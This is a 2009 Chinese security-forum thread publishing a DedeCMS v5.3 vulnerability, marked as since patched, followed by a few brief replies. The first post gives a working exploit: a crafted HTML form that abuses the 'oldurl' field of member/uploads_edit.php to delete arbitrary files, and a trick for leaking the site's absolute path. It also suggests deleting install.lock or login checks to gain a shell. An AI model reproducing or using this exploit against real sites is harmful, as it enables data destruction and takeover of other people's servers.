【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: dedecms v5.3 0day [现在官方已经出补丁] [打印本页]

作者: oooooo 时间: 2009-7-10 10:30 标题: dedecms v5.3 0day [现在官方已经出补丁]

1.删除网站任意文件.
2.爆绝对路径
影响系统 = DedeCMS V5.3

1.删除任意文件.
注册正常用户...随意找个地方上传个附件就OK.
部分代码:
复制代码
<form class="mTB10 mL10 mR10" name="form1" action="http://网站地址/member/uploads_edit.php" method="post" enctype="multipart/form-data">
   <input type="hidden" name="aid" value="28" />
   <input type="hidden" name="mediatype" value="1" />
   <input type="hidden" name="oldurl" value="要删除的文件" /> <!--如value="/index.php">
   <input type="hidden" name="dopost" value="save" />
   <table cellspacing="1" class="submit">

修改完毕后.打开HTML页.直接点提交.
然后在用户管理附件里点击删除.

2.爆路径.
也是利用原来的html代码..
复制代码
  <td align="right" valign="top">更换附件：</td>
      <td><input name="addonfile" type="file" id="addonfile" style="width:300px" /></td>

把type="file"删除.保存.然后打开.直接点提交.

就可以爆路径了..
具体的如何利用这个漏洞拿到SHELL.就看你自己的想象力了..比如删除install.lock....比如删除用户登陆检测..

作者: 流淚╮鮭鮭 时间: 2009-7-10 14:04

晕，官方发布补丁应该都会补上吧。

作者: 1106355123 时间: 2009-7-10 16:46

佩服楼主。。。。
光看楼主发的帖子就意Y到楼主是牛人了

作者: badguest 时间: 2009-7-11 16:33

晕了,真伤脑力,这代码怎么搞偶搞糊涂了！

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com./)